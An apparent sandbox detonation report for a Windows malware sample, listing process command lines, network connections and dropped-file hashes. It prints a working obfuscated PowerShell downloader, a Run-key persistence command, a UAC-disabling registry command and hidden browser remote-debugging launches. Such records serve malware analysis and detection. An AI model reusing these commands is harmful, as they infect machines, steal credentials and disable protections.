(Physiotherapist ' Man$.fveGAkk l oruoGeniB SelA Z nlTieb:Preih DagEc ruA Va D nreQAflaU RedaUmagrAbriTKvadeS,leRD.rgiLuftNRo,sgT le=Head$LeatuDef.nfluvLBarso ProVsen.ITypeNSkotGSvinlBu dYS ud. orsNoncUtu.nbStabsSta,tUncoRMedeiGradNP etGMi i(Fil $NormmTeleoSockNR,ceo.ranp ArbrKvarOGravtTekniCaumcafsn,Dulc$Mrk BFre.A.nsoAPampd Ha mP ylOAppaTProdOEnphrUnireDompr and1 Tre8E go0tykm)Pibe ');Airfares $Headquartering;"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Delepunkter Preeconomically Gybed #>;$backfisch='Unbedabbled';<#Kommuneplaner troldmandsorganisationens Modelune Hectocotylization Petrobrusian #>; function Physiotherapist($skvalpe){If ($host.DebuggerEnabled) {$Cathlins227++;}$Premious=$Scathed+$skvalpe.'Length' - $Cathlins227; for ( $Bulbochaete=4;$Bulbochaete -lt $Premious;$Bulbochaete+=5){$Kulturhistoriens218=$Bulbochaete;$Allergikere+=$skvalpe[$Bulbochaete];}$Allergikere;}function Airfares($Differentierbart){ . ($Frysediske) ($Differentierbart);}$Historiographies=Physiotherapist ' attMIn,qoTurnzDeaciPro lpol,lDam a Nyv/ Ent ';$Arcsine=Physiotherapist ' In TKu elBughsCon.1 N.n2Marg ';$belard='Sei,[ ,enn.odbE PorT Ski.HandSLa,eeDra rMaltv MegIFauncSympeRuddPbehaOA peISavaNSquiTBa bmSuppAMagtN MolaMacogTripE egyrLa r]Empy:Mira:.ruks Lf.eStrecGa.duForsrsl vi inkt riny MyePMoseRUnl OMistTJocoOExtrcGa tohardLDob.=Deli$UdkaABrlerTi scAnstsKiloIPrlunChisE A.a ';$Historiographies+=Physiotherapist 'B.ug5Isam.Knal0C mp F,r(A,elWFloki ian.agedMistoB hawReh,s re SammN El TKen ug n1N.za0Revi.Guat0Enfe;B ta BeerW Re imalhnCh c6Drip4 brs;P rs selvxTyks6Snoo4X,lo;Side PulmrApo vVult:Smel1 Kor3gran1 Fre.Udem0reco)Bagv HeidG nloeAlfacHulikH maofosf/ nde2Jagt0Medi1Du.c0A,st0 Sub1Solh0 aki1Bil, UkamFKbstiB,acrUndeePrecfTlleoPag x .id/Rens1Logi3Misb1R nh.Tnde0Jowl ';$Lkkerbiskenen=Physiotherapist 'KapruRotts DisEE gorWo b-Basta .aagekviEDatan DurTTre. ';$Parken=Physiotherapist 'B ndh ddit SvrtForgpProssPoki:Soun/Jinr/DitidUngarVindiPsorvSolveHerm.Kursg pshoUnfloNo rgCykelForhePlat.P,uvcmas oShabm Con/ SonuWisscForf?Un de.eckxRedipVenioSemirU.cotsece=No.ndMulto SkuwGam nUd nl isoIndbaKlasdSemi&Boosi.pirdSout=H,li1Gray-Skilv RevoEy,bx ehyB Te yUdlgw PedAKataA AnuwEff,-holdo ignhMani_Bl.pQBullv uaneDa.olA reEromaF Mo QS ej5Baby3MastpChe,6UnitLStigFBayovritz6Bas.x .tatTeen5Ula ';$Kalibreringerne=Physiotherapist 'Pren> Fi ';$Frysediske=Physiotherapist 'Sm giEfteE Kedxbrau ';$Urgency='Opmuntredes';$Bulbochaetenefficacity='\Boganmelderen.Flu';Airfares (Physiotherapist 'vedf$PresGForfL otoTempbJus,A MailDiaz:S ndI rueLLignL KryU auksSar,tUnr R ulhaB.smtMalaiAlacV ronTWar = Unc$ Ma EHistn AblvA,se:B,okALawypBetoP IndDVerrA annT gasaJenk+Sl,m$StanB Ki uG nilFletbBookONymfCTumoHHousA D.ie isptSegmeEvenN TypEAutofUndefSelei.ulicAlteAM.ddcImagISam.TBoerYVari ');Airfares (Physiotherapist ' Sam$Gongg H,slInteoDiabb Fora velTank:Squig orrAKonnRJagtD undeFarvnRegiICockZPercEBeausSmig= Tog$RamapSte,aSkraR letk Ba.EIntenIntr.PoetSeftePKor l Ru iUngeTBort( Non$MisokPa maAdfrL si I ForBFlusr ManeHaa RHorii,kuvNKondg.noweDelkRBjerNUbegeIndk)P rs ');Airfares (Physiotherapist $belard);$Parken=$gardenizes[0];$Bulbochaetentuitionalist=(Physiotherapist ' isi$Ag ag Th lSpisOfastbSkjoAM.llLbyba: MatF A bo Vu.RPumaK rivUSch,lOverN AspIHvidNHdtvg,haieHemiR incSChar=overNMereE SkjWUdfl- ornO Stvb T.nJJ.eseAnagcAttaTBe.r BoersNervYBranS SekTAl aESvenMUntu.EpidN Sa eAracT kl.EspeW onoe In bFlyec,etul ejiNon.EGraen SlgTSk l ');Airfares ($Bulbochaetentuitionalist);Airfares (Physiotherapist 'dulo$ExhaF rneoFoedrBa,dkHvepuGrael RepnBr.diPre n NilgCycleVi krops,s Bee.OranHDokue Om a,utbd,poteNo,mrSv gsPi s[None$Ob eLDybdk Stak Gr eSky.rEchabTilliNormsTelek .loe resn HygeFemhnSubc] B r= ind$PartHOut i Fl,sVenet UrkoOnd rAdj iKnneoBlungBecarTaxaaFllepCarmhSlutiBil.eClinsAgam ');$Dalrede=Physiotherapist 'Ind.$AeroFhairoInebrAdrekS rruAsbelBib nposiiIntenLobegDiseeBrusr nalsKeel. M.hDF rtoSkriw D,nnRef lill,oGrubaT,epd PerF CuliSupelUn ne.oll( vi$phaePPr,eaStrer Irrk OrteSpacnTria,Mana$Ret O.nbop F.drOvere GlatUngetAnaleOmk lBoghiRotogTerre IndsWine)Meni ';$Opretteliges=$illustrativt;Airfares (Physiotherapist 'Slim$TranG VaslMillo DamBarbeA.iabLSpi.:Aspim svaESocis,lumt UbrR GaaeShirtTeat=kuld(PreaTPoeme EpiSPolaTLejr- Anop C oaOpretTritHAcer Ba m$KumeoTv.lPCathRG.anEDgnvtG rlt andEEmbeLUnaiI StngSto ELandsF,rl)S ap ');while (!$Mestret) {Airfares (Physiotherapist ' Ke.$Mahug EdulOptioP,eub UndaPulvl ota: oncFTrieaZagrrMinivWhereSenafDoubaMer.sVegetBere=Su.p$ oltt Admr evou,aireRe.t ') ;Airfares $Dalrede;Airfares (Physiotherapist 'SemiSAan TMacrA ,ivrKan.tBu,n-BybiSO erLFldneMikeE treP o t S e4Chap ');Airfares (Physiotherapist 'Frit$ReapGFabulIne oE erBBr nabardl Sys:Al tM T neFortSE emtNatuRArche afsT Ar =Bogt(GyratBoxieMahaSdatatEks - SjkpRe da ReutBombH W r Sner$RkenoOve.P PriR yroEDandTSrskTRe reBullL f,riEbbegbagee eldsSta )Forl ') ;Airfares (Physiotherapist 'In e$Sig,gWaldL IndOFah,B uveA elvL V j:Breni T gNTrygtGusteUbesR KnoD.ecae KviPBalwaN ntrSubsTKvalMGi deVan nsongTPu vA bydL KolLOcc.Y ,ol=Phan$Vagag Foul anoFlleb SrgACruslisaf:StagSUndeyViruD L uV.llie PitnReg dDrivTCigaEAnk s.fso1S ff0 Men6S,mm+Un i+Smit%kard$BlokGPlasaPraiR BddDOrviE V,lNTageiMeroz VeneOpbySAspa.AgilC OptOspinU UndN U,tT ntr ') ;$Parken=$gardenizes[$Interdepartmentally];}$Monoprotic=290512;$Baadmotorer180=29973;Airfares (Physiotherapist 'V gt$ SulGJustLBhojoAsatB RasaSunsl.ead:BiscsAmtstSejuOPhlee PelT V ntP raeBrannSvrn lang=Amfi ignigkau EBesktJ,ra- S oc kovo ,veNFrakT ousePersnAn lt Dru Le.$fl,soSug P GalrOvereN.utttankTBrugeAn iLarbeIDkniG OuteKrigsSpli ');Airfares (Physiotherapist ' Sta$Sking an lProto SepbS bpa B.gl Ryk:brddN Samo PronBr ggAbeneBrocrKnosmBivui Nyln,ikeaFrdal nin Flos=semi Skat[ ireSSkr y O asOperthempe B.vmFeri. RegCUparoManinSkravKnkkeargerslugtCreb]T kk:Arti:AfstFA sir Cyko rysmdiveB BunaUdlgs RineSoir6Mors4MiddS Teot SkarUb tiReginAflngBeha(Litt$PneuSharstIndioM,gaeade,tIndstAntieAlkonS yd)Regi ');Airfares (Physiotherapist 'Vipe$ BrngHun LDundoSmaaBKontAFlerlremi:NedfUM non Recl,nteOAnlovMyceILathNRyttG Ph,lAno.y,nde icr= ex Glow[smaaSEmblyDeseS balT,idnePumpMLuft.O blTC,epeblanXSureTGoka.,lekeRemuNBlasCS agOMaskDS.liiDireNCrasgLune]Angu:Roge:AnviATeleSHmorCMe fISubbI ofa.BrusG Sp ePicoTDobbs SnitBr,iR eliI SitNHrmyg U g( Sol$ ElensporoKul n,yopGPr,cEFal.RWhalMUntaIStr.nS,sta wiel Sem)Weim ');Airfares (Physiotherapist ' Man$.fveGAkk l oruoGeniB SelA Z nlTieb:Preih DagEc ruA Va D nreQAflaU RedaUmagrAbriTKvadeS,leRD.rgiLuftNRo,sgT le=Head$LeatuDef.nfluvLBarso ProVsen.ITypeNSkotGSvinlBu dYS ud. orsNoncUtu.nbStabsSta,tUncoRMedeiGradNP etGMi i(Fil $NormmTeleoSockNR,ceo.ranp ArbrKvarOGravtTekniCaumcafsn,Dulc$Mrk BFre.A.nsoAPampd Ha mP ylOAppaTProdOEnphrUnireDompr and1 Tre8E go0tykm)Pibe ');Airfares $Headquartering;"
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\SysWOW64\msiexec.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Sirkeer% -windowstyle 1 $Oxidisings=(gp -Path 'HKCU:\Software\Runen\').Serviceorganisationers;%Sirkeer% ($Oxidisings)"
C:\Windows\SysWOW64\reg.exe
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Sirkeer% -windowstyle 1 $Oxidisings=(gp -Path 'HKCU:\Software\Runen\').Serviceorganisationers;%Sirkeer% ($Oxidisings)"
C:\Windows\SysWOW64\cmd.exe
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\reg.exe
C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Program Files\Google\Chrome\Application\Chrome.exe
--user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
C:\Program Files\Google\Chrome\Application\Chrome.exe
"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff98830cc40,0x7ff98830cc4c,0x7ff98830cc58
C:\Program Files\Google\Chrome\Application\Chrome.exe
"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1948,i,5468349163655652285,4927405294462988634,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1944 /prefetch:2
C:\Program Files\Google\Chrome\Application\Chrome.exe
"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2092,i,5468349163655652285,4927405294462988634,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2144 /prefetch:3
C:\Program Files\Google\Chrome\Application\Chrome.exe
"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2240,i,5468349163655652285,4927405294462988634,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2400 /prefetch:8
C:\Windows\SysWOW64\msiexec.exe
C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\qfcz"
C:\Windows\SysWOW64\msiexec.exe
C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\azikgfoy"
C:\Windows\SysWOW64\msiexec.exe
C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\lbndhyzrmtt"
C:\Program Files\Google\Chrome\Application\Chrome.exe
"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3144,i,5468349163655652285,4927405294462988634,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3164 /prefetch:1
C:\Program Files\Google\Chrome\Application\Chrome.exe
"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3172,i,5468349163655652285,4927405294462988634,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3232 /prefetch:1
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\Chrome.exe
"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4356,i,5468349163655652285,4927405294462988634,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4556 /prefetch:1
C:\Program Files\Google\Chrome\Application\Chrome.exe
"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4704,i,5468349163655652285,4927405294462988634,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4716 /prefetch:8
C:\Program Files\Google\Chrome\Application\Chrome.exe
"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4868,i,5468349163655652285,4927405294462988634,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4848 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
--user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ff9881c46f8,0x7ff9881c4708,0x7ff9881c4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1984,15776921180154964884,9585255585468829726,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2092 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1984,15776921180154964884,9585255585468829726,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1984,15776921180154964884,9585255585468829726,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2924 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=1984,15776921180154964884,9585255585468829726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3348 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=1984,15776921180154964884,9585255585468829726,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1988 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=1984,15776921180154964884,9585255585468829726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5328 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=1984,15776921180154964884,9585255585468829726,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5316 /prefetch:1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.12.20.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| GB | 142.250.187.206:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| GB | 172.217.16.225:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | 206.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.27.10:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 10.27.171.150.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| GB | 142.250.187.206:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.187.227:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | o.pki.goog | udp |
| GB | 172.217.16.227:80 | o.pki.goog | tcp |
| US | 8.8.8.8:53 | 227.187.250.142.in-addr.arpa | udp |
| GB | 172.217.16.225:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | 56.163.245.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | a458386d9.duckdns.org | udp |
| JP | 46.250.249.149:3256 | a458386d9.duckdns.org | tcp |
| US | 8.8.8.8:53 | 149.249.250.46.in-addr.arpa | udp |
| JP | 46.250.249.149:3256 | a458386d9.duckdns.org | tcp |
| JP | 46.250.249.149:3256 | a458386d9.duckdns.org | tcp |
| JP | 46.250.249.149:3256 | a458386d9.duckdns.org | tcp |
| US | 8.8.8.8:53 | geoplugin.net | udp |
| NL | 178.237.33.50:80 | geoplugin.net | tcp |
| US | 8.8.8.8:53 | 50.33.237.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.180.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.180.4:443 | www.google.com | tcp |
| GB | 142.250.180.4:443 | www.google.com | udp |
| US | 8.8.8.8:53 | 4.180.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ogads-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | apis.google.com | udp |
| GB | 216.58.212.234:443 | ogads-pa.googleapis.com | tcp |
| GB | 216.58.201.110:443 | apis.google.com | tcp |
| GB | 216.58.212.234:443 | ogads-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | 234.212.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 110.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 172.217.16.238:443 | play.google.com | tcp |
| N/A | 127.0.0.1:9222 | tcp | |
| N/A | 127.0.0.1:9222 | tcp | |
| N/A | 127.0.0.1:9222 | tcp | |
| N/A | 224.0.0.251:5353 | udp | |
| N/A | 127.0.0.1:9222 | tcp | |
| N/A | 127.0.0.1:9222 | tcp | |
| N/A | 127.0.0.1:9222 | tcp | |
| US | 8.8.8.8:53 | 94.12.20.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.116.69.13.in-addr.arpa | udp |
Files
memory/876-4-0x00007FF987C23000-0x00007FF987C25000-memory.dmp
memory/876-7-0x00000275B4490000-0x00000275B44B2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1hww41yy.eci.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/876-15-0x00007FF987C20000-0x00007FF9886E1000-memory.dmp
memory/876-16-0x00007FF987C20000-0x00007FF9886E1000-memory.dmp
memory/876-19-0x00007FF987C23000-0x00007FF987C25000-memory.dmp
memory/876-20-0x00007FF987C20000-0x00007FF9886E1000-memory.dmp
memory/876-23-0x00007FF987C20000-0x00007FF9886E1000-memory.dmp
memory/1300-24-0x0000000004840000-0x0000000004876000-memory.dmp
memory/1300-25-0x0000000004F70000-0x0000000005598000-memory.dmp
memory/1300-26-0x0000000004F10000-0x0000000004F32000-memory.dmp
memory/1300-27-0x0000000005610000-0x0000000005676000-memory.dmp
memory/1300-28-0x00000000056F0000-0x0000000005756000-memory.dmp
memory/1300-38-0x00000000057E0000-0x0000000005B34000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 71444def27770d9071039d005d0323b7 |
| SHA1 | cef8654e95495786ac9347494f4417819373427e |
| SHA256 | 8438eded7f1ab9b4399a069611fe8730226bcdce08fab861d4e8fae6ef621ec9 |
| SHA512 | a721af797fd6882e6595b7d9610334f1fb57b809e504452eed4b0d0a32aaf07b81ce007bd51605bec9fcea7ec9f1d8424db1f0f53b65a01126ec4f5980d86034 |
memory/1300-40-0x0000000005DD0000-0x0000000005DEE000-memory.dmp
memory/1300-41-0x00000000063E0000-0x000000000642C000-memory.dmp
memory/1300-42-0x0000000007660000-0x0000000007CDA000-memory.dmp
memory/1300-43-0x0000000006340000-0x000000000635A000-memory.dmp
memory/1300-44-0x0000000007080000-0x0000000007116000-memory.dmp
memory/1300-45-0x0000000007010000-0x0000000007032000-memory.dmp
memory/1300-46-0x0000000008290000-0x0000000008834000-memory.dmp
C:\Users\Admin\AppData\Roaming\Boganmelderen.Flu
| MD5 | ac80305fd031c1503e7877619582a6b4 |
| SHA1 | 2e74e8704cc59c0acc9b8c5aeb827a180035d76c |
| SHA256 | a08a0576b76e5f6d59c6a929f15049bc75663e668c7cddd6fdaeee38f9e27bcd |
| SHA512 | fa401dfd53787aa0fa03a7401621c9ea2393fa2f5fe9e0e61cbb155970afde6edf60ec58c8756f98e35c726554833e699a2e8069d29619f8acd58c36e7bac533 |
memory/1300-48-0x0000000008840000-0x0000000009ECC000-memory.dmp
memory/4128-61-0x0000000001200000-0x0000000002454000-memory.dmp
memory/4128-70-0x000000001FC40000-0x000000001FC74000-memory.dmp
memory/4128-71-0x000000001FC40000-0x000000001FC74000-memory.dmp
memory/4128-67-0x000000001FC40000-0x000000001FC74000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Local State
| MD5 | bf4d1b47ad20cebbb40d438875656d28 |
| SHA1 | a92d53b8748e947a5f0dae01b4fd0f0fa24fbc18 |
| SHA256 | 74f92c8a8955747c9db310f3ea7c1565a091617efc39de873127bb24a71ebf83 |
| SHA512 | 5baae57e8083980683b12556d6ef28424c7cc6bcba644529d72834291e4688eba21bd864f3321314174991dad3d6da68a235dd601054f49b42499c137700bbcb |
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Secure Preferences
| MD5 | c6c59a39ea2a8bd650f111ad9bffbb18 |
| SHA1 | dab48c89ed54dad31f37d13fc5768285afeb370b |
| SHA256 | bb0c7af9010736950f57d7e37f32bbae1349323ae4399bdc0261774cdf63ea72 |
| SHA512 | ef16ca2301cd2b0410b7f16dcbd74a242060397a68187e5140ac02b6535241724bac574124dc20c78952ba1d678e02c887ccb61e5d9f527c0ebca8915a2c8c18 |
\??\pipe\crashpad_3416_FXRTAOIWSLENKMYM
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Network\Cookies
| MD5 | acdec2ee1150d46348b1e5d754d4f54a |
| SHA1 | 352d17f396a2db507e208a81b0c33d615ecefc8b |
| SHA256 | 49be81366f6def22f3ae46cf7e04a398901f7d72a3813813c286d02ff7524643 |
| SHA512 | a201e149b7afe8a026a772fea0580bb79832f079923a91b131ac1094f451a0bf064570d03298fc3107dfdd0caad9367a8b859652d794de1a1b2df19a305e63aa |
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Local Storage\leveldb\CURRENT
| MD5 | 46295cac801e5d4857d09837238a6394 |
| SHA1 | 44e0fa1b517dbf802b18faf0785eeea6ac51594b |
| SHA256 | 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443 |
| SHA512 | 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23 |
memory/2964-112-0x0000000000400000-0x0000000000478000-memory.dmp
memory/2964-113-0x0000000000400000-0x0000000000478000-memory.dmp
memory/2196-117-0x0000000000400000-0x0000000000462000-memory.dmp
